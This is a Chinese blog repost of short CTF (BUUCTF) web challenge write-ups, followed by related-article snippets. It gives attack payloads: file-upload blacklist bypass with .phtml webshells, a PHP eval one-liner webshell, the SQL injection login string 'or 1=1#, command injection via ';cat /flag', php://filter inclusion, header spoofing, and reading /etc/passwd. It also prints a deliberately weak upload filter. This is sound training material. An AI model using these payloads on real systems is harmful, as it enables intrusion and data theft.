ctf题目php文件上传如何绕过_BUUCTF web 刷几道菜鸡能做的题

最新推荐文章于 2024-07-21 14:30:49 发布
最新推荐文章于 2024-07-21 14:30:49 发布
阅读量1k 收藏
点赞数
文章标签: ctf题目php文件上传如何绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28862967/article/details/112950650
版权
本文介绍了多个CTF比赛中的PHP文件上传漏洞利用案例,包括如何绕过后缀过滤、前端验证和黑名单。通过修改请求参数,如将文件名后缀改为.phtml,以及利用PHP弱类型特性,成功获取shell并读取敏感信息。
摘要由CSDN通过智能技术生成

[WUSTCTF2020]CV Maker(文件上传)

1、注册,登录,上传图片马,用bp抓包后将filename后缀改为php,连上蚁剑。

[极客大挑战 2019]Havefun(简单代码审计)

[极客大挑战 2019]Knife

1、直接连上蚁剑。果真白给的shell。

[极客大挑战 2019]EasySQL(万能密码)

username=‘admin‘or 1=1#‘ and password=‘随便写‘

用户名:‘or 1=1#

密码 : 随便输

[ACTF2020 新生赛]BackupFile(备份文件泄露&php弱类型)

1、用wsacn扫出备份文件index.php.bak

2、

include_once "flag.php";

if(isset($_GET[‘key‘])) {

$key = $_GET[‘key‘];

if(!is_numeric($key)) {//如果$key不是数字,输出Just num!

exit("Just num!");

}

$key = intval($key);

$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";

if($key == $str) {

echo $flag;

}

}

else {

echo "Try to find out source file!";

}

要求$key是数字,且弱等于123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3

测试:

所以,string在和int弱比较时,string会强制转换为int,删掉第一个字符及其后面的所有内容,只保留最前面的数字。

key=123就可。

[ACTF2020 新生赛]Upload(文件上传-前端js验证&黑名单绕过)

1、F12,删除οnsubmit="return checkFile()",绕过前端验证

2、发现不能上传php,就是可能后端黑名单过滤了php

上传一句话木马,用burpsuite抓包,修改filename的后缀为.phtml,连上蚁剑。

最后,放上源码:

error_reporting(0);

//设置上传目录

define("UPLOAD_PATH", "./uplo4d");

$msg = "Upload Success!";

if (isset($_POST[‘submit‘])) {

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$file_name = $_FILES[‘upload_file‘][‘name‘];

$ext = pathinfo($file_name,PATHINFO_EXTENSION);

if(in_array($ext, [‘php‘, ‘php3‘, ‘php4‘, ‘php5‘])) {

exit(‘nonono~ Bad file!‘);

}

$new_file_name = md5($file_name).".".$ext;

$img_path = UPLOAD_PATH . ‘/‘ . $new_file_name;

if (move_uploaded_file($temp_file, $img_path)){

$is_upload = true;

} else {

$msg = ‘Upload Failed!‘;

}

echo ‘

‘.$msg." Look here~ ".$img_path."
";

}

?>

[ACTF2020 新生赛]Exec(命令执行)

1、先ping 127.0.0.1,能ping通

2、ping 127.0.0.1;cat /flag和127.0.0.1 & cat /flag都可以

但是不知道ping 127.0.0.1 && cat /flag就不行

[ACTF2020 新生赛]Include(文件包含)

1、直接?file=php://filter/read=convert.base64-encode/resource=flag.php

[极客大挑战 2019]Http

1、Ctrl+U查看源码,发现了Secret.php

2、

提示了访问的网址,用burpsuite添加Referer头

3、

要求使用Syclover浏览器,再添加User-Agent

4、

只能本地访问,添加X-Forwarded-For

[极客大挑战 2019]BuyFlag

打开menu下的payflag后,发现一些hint

1、要100000000 money

2、必须是成新的student

3、correct password

在源码最后的一段发现有用的注释

1、要post提交money和password,money用科学计数法

2、password要弱等于404,还不能是数字,就利用php弱类型

money=1e10&password=404a

没啥啊。。。

用burpsuite抓包

发现user值为0,果断改为1,嘿嘿嘿

原文:https://www.cnblogs.com/wrnan/p/12720927.html

关岛奈奈
关注
【网络安全 | CTF】攻防世界 Web_php_unserialize 解详析
等风来
05-28 3810
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
20210218CTF伪协议绕过file_get_contents(bugkuctfweb21御结冰城感想)
热门推荐
qq_45290991的博客
02-18 1万+
CTF中常用的php伪协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
ctf题目php文件上传如何绕过_ctf基本的文件上传绕过学习
weixin_42591413的博客
02-01 3184
绕过客户端校验前台脚本检测扩展名上传webs hell原理:当用户在客户端选择文件点击上传的时候,客户端还没有向服务器发送任何消息,就对本地文件进行检测来判断是否是可以上传的类型,这种方式称为前台脚本检测扩展名。绕过前台脚本检测扩展名,就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名,通过 BurpSuite 工具,截取数据包,并将数据包中文件扩展名更改回原来的,达到绕过的目的实验:打开要...
ctf题目php文件上传如何绕过_CTF题目相关漏洞总结(CBC模式加密,opcache,LD_PRELOAD)
weixin_31969199的博客
02-01 1029
0x00 php7 opcache执行 PHP 代码1. 环境配置123456[opcache]zend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20151012/opcache.soopcache.enable=1opcache.validate_timestamps=0 ;漏洞利用条件opcache.file_cach...
CTF-文件上传(文件包含)总结
最新发布
2302_78903258的博客
07-21 1682
攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中,正常情况下,PHP会将用户输入的文件名进行resolve,转换成标准的绝对路径,这个转换的过程会将…来实现的,它会检查左侧的表达式是否为 null,如果是则使用右侧的默认值。以及 fd 怎么办呢?
ctf不允许上传该类型php,CTFHUB-技能树-Web-文件上传
weixin_39847556的博客
03-12 641
无验证直接写一个一句话木马,上传,然后连接getshell前端验证&&MIME绕过将一句话木马文件后缀改为允许类型,如jpg等,然后bp拦截数据包,然后改后缀为php,然后放包,最后连接√√√文件头检查(/欺骗)依然是先把shell文件后缀改为允许的,然后拦截数据包,改文件头,以及文件后缀,然后连接getshell也可以上传一个图片马,制作方法:copy 1.jpg/b+1.php...
ctf不允许上传该类型php,d3ctf easyweb
weixin_42474164的博客
04-01 528
前言这道思路其实就是,如果在php中遇到了模版注入,但是限制了不允许执行php代码的时候,怎么通过模版注入达到RCE的效果考点预期:二次注入模版注入phar反序列化CI RCE POP链挖掘非预期:二次注入模版注入SSTI沙箱逃逸二次注入image.png可以看到,在get_view的时候,通过session中的userid从数据库中取出了用户的username,之后对username进行了两次...
CTF学习笔记16:iwebsec-文件上传漏洞-01-前端JS过滤绕过
lvx++的博客
02-20 1037
一、正常情况下无法上传php文件 二、分析页面js代码 三、使用“Javascript Toggle On and Off”插件,关闭javascript,上传成功 php文件内容如下 <?php eval($_POST['cmd']);?> 说明:以上代码仅用于本地测试学习! 四、测试连接 五、成功获取服务器控制权 ...
最新PHP CTF常见考绕过技巧_str_replace函数绕过(1)
05-04 811
PHP中md5()函数无法处理数组(会返回NULL)==的也可以用数组绕过
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctfhub web全部记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件上传漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
关于phpexit函数的绕过
https://www.cnblogs.com/zpchcbd/
04-01 2812
<?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
ctfshow-web入门117(绕过exit头部限制)
qq_44657899的博客
10-27 1771
源码如下: <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_match('/ht
php 死亡绕过
m0_75178803的博客
04-09 487
之类的限制) ,不管后面的语句是什么,都会先执行退出,导致后面的语句不执行,这也叫php死亡退出。base64编码中只包含64个可打印字符,而php在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。运用到一个正则表达式,会把输入进行正则匹配,把内容里不符合条件的,比如说<?base64是四个字符一解密,前面的8个字符解密后会变成6个乱码,后面的正常解密,获得加密之前的语句。因为我们加入了一个a。
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1804
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 6327
文件上传的番外,一句话木马绕过思路,第二版整理,还是会根据经验增补的~
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1816
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP的弱比较 进入正之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
文件上传漏洞检测及绕过姿势小结
LUOBIKUN的博客
09-23 3155
文件上传漏洞概述 定义 Web应用程序一般都具有上传功能,如果服务端代码未对客户端上传的文件进行严格的验证和过滤,恶意攻击者可以上传脚本文件并被服务器解析,文件上传漏洞就产生了。 检测及绕过姿势汇总 一般来说,关于文件上传漏洞的检测分为两个大方面: 注明: 以下的绕过方法,是针对具体的某种检测方式而言,现实中遇到的环境,大多是多种检测方式的组合,绕过方式也视具体而定。 客户端检测 原理: 在网页上写一段Javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。 绕过方法: 1.直接禁用J
ctf 图片 php_一次ctf文件上传php代码审计
weixin_35753291的博客
03-09 786
朋友发的一个ctf了好久才出来,记录一下。0x01 源码highlight_file(__FILE__);@mkdir("./upload");if (isset($_POST['submit'])) {$is_upload = false;$text = null;if(!empty($_FILES['upload_file'])){$allow_type = array('image/...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值